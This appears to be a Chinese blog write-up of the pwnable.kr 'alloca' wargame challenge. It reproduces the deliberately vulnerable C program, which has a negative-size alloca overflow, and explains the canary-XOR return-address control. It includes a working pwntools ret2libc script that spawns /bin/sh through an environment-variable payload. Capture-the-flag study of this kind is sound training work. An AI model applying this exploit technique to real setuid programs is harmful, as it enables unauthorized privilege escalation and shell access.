[pwnable.kr]--alloca
2016-08-14 19:17
183 查看
0x00:
好久没玩了...去年十月以后就没玩过了TAT 这几天把peach的坑,winafl的坑填了下,就来搞下pwn。0x01:
这个程序是给了源码的#include <stdio.h> #include <string.h> #include <stdlib.h> void clear_newlines(){ int c; do{ c = getchar(); }while (c != '\n' && c != EOF); } int g_canary; int check_canary(int canary){ int result = canary ^ g_canary; int canary_after = canary; int canary_before = g_canary; printf("canary before using buffer : %d\n", canary_before); printf("canary after using buffer : %d\n\n", canary_after); if(result != 0){ printf("what the f...??? how did you fucked this buffer????\n"); } else{ printf("I told you so. its trivially easy to prevent BOF :)\n"); printf("therefore as you can see, it is easy to make secure software\n"); } return result; } int size; char* buffer; int main(){ printf("- BOF(buffer overflow) is very easy to prevent. here is how to.\n\n"); sleep(2); printf(" 1. allocate the buffer size only as you need it\n"); printf(" 2. know your buffer size and limit the input length\n\n"); printf("- simple right?. let me show you.\n\n"); sleep(2); printf("- whats the maximum length of your buffer?(byte) : "); scanf("%d", &size); clear_newlines(); printf("- give me your random canary number to prove there is no BOF : "); scanf("%d", &g_canary); clear_newlines(); printf("- ok lets allocate a buffer of length %d\n\n", size); sleep(1); buffer = alloca( size + 4 ); // 4 is for canary printf("- now, lets put canary at the end of the buffer and get your data\n"); printf("- don't worry! fgets() securely limits your input after %d bytes :)\n", size); printf("- if canary is not changed, we can prove there is no BOF :)\n"); printf("$ "); memcpy(buffer+size, &g_canary, 4); // canary will detect overflow. fgets(buffer, size, stdin); // there is no way you can exploit this. printf("\n"); printf("- now lets check canary to see if there was overflow\n\n"); check_canary( *((int*)(buffer+size)) ); return 0; }
主要还是需要突破他的防护,拿到shell。
看下bin文件开了什么保护:
调试发现,check_canary()函数返回的时候,如果恰当的设置g_canary的值,就可以控制返回地值。
然后我就卡在这里了...开启了NX,只能ROP的思路搞,但是ROP链又不知道哪里放置。
0x02:
后来参考了别人的做法,才发现这是个本地利用...直接按照以前玩overthewire学来的套路就可以:sc放在环境变量离,然后确定地址,直接改返回地值过去就可以了。不过首先要利用
ulimit -s unlimited去固定下libc的加载地址,然后才可以确定system()和/bin/sh地址。
附上我本地调试的时候的exp,环境不同,所以地址可能不同。
from pwn import * import os off_system = 0x0003d3e0 # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system off_shell = 0x0015ea69 # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6 adr_libc = 0x40047000 # ldd alloca adr_payload = 0x40025857 # searchmem "AAAA" payload = p32(adr_libc + off_system) payload += p32(0xdeadbeef) payload += p32(adr_libc + off_shell) #test = "AAAABBBBCCCC" #p = process('./alloca', env = {'LD_PRELOAD': test}) p = process('./alloca', env = {'LD_PRELOAD': payload}) #raw_input("$$") p.sendline(str(-92)) p.sendline(str((adr_payload + 4) ^ 0x08048250)) p.interactive() ''' 0x40025857 ^ 0x08048250 --> 0x4806da07 Cannot access memory at address 0x4806da03 0x40025857 + 4 '''
0x03:参考链接
http://0byjwzsf.me/2016/08/08/pwnable-rookiss-alloca/#more相关文章推荐
- pwnable.kr writeup之unlink
- pwnable.kr之simple login详解
- 全面剖析Pwnable.kr unlink
- pwnable.kr 之simplelogin
- pwnable.kr fsb writeup
- pwnable.kr之fd
- pwnable.kr write up 之 sample login
- pwnable.kr [Toddler's Bottle] - lotto
- pwnable.kr
- pwnable.kr collision
- pwnable.kr [Toddler's Bottle] - cmd1
- pwnable.kr 之asm
- pwnable.kr [Toddler's Bottle] - cmd2
- pwnable.kr—bof
- pwnable.kr---leg
- pwnable.kr [Toddler's Bottle] -fd
- pwnable.kr [Rookiss] - [simple login]
- pwnable.kr
- 通过pwnable.kr从零学pwn
- pwnable.kr [Toddler's Bottle] - collision